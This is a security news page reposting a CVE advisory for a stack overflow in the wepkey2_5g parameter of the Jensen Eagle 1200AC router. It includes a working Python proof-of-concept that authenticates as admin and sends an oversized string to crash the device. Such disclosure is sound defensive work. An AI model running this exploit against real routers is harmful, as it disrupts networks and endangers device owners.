Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-24125: [CVE-2023-24125] DoS via wepkey2_5g parameter in Eagle 1200ac

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey2_5g parameter at /goform/WifiBasicSet.

CVE
#auth#wifi

[CVE-2023-24125] DoS via wepkey2_5g parameter in Eagle 1200ac****Description

Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wepkey2_5g parameter at /goform/WifiBasicSet.

Additional information

In the handler function for action /goform/WifiBasicSet (formWifiBasicSet), the user-controlled string wepkey2_5g is stored into wl5g.extra.wep_key2 via SetValue.

When then calling /goform/WifiBasicGet (formWifiBasicGet), the string is loaded from wl5g.extra.wep_key2 and then stored into stack buffer wifi_buf_entry. Because the length of wepkey2_5g is not checked, the stack buffer can be overflowed if it is a large string.

PoC script:

import requests

IP="192.168.38.1"

logindata = {
"username":"admin",
"password":"81dc9bdb52d04dc20036dbd8313ed055"
}

def login():
    for i in range(10):
        session = requests.Session()
        res = session.post(f"http://{IP}/login/Auth", data=logindata)
        try:
            passwd = session.cookies["password"]
            return passwd
        except:
            pass

session = requests.Session()
session.cookies.set("password",login())

payload = {
    "wepkey2_5g" : "A"*(0x1000),
    "security" : "wep"
    }
res = session.post(f"http://{IP}/goform/WifiBasicSet", data=payload)
print(res.status_code)

res = session.post(f"http://{IP}/goform/WifiBasicGet")
print(res.text)
print(res)

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907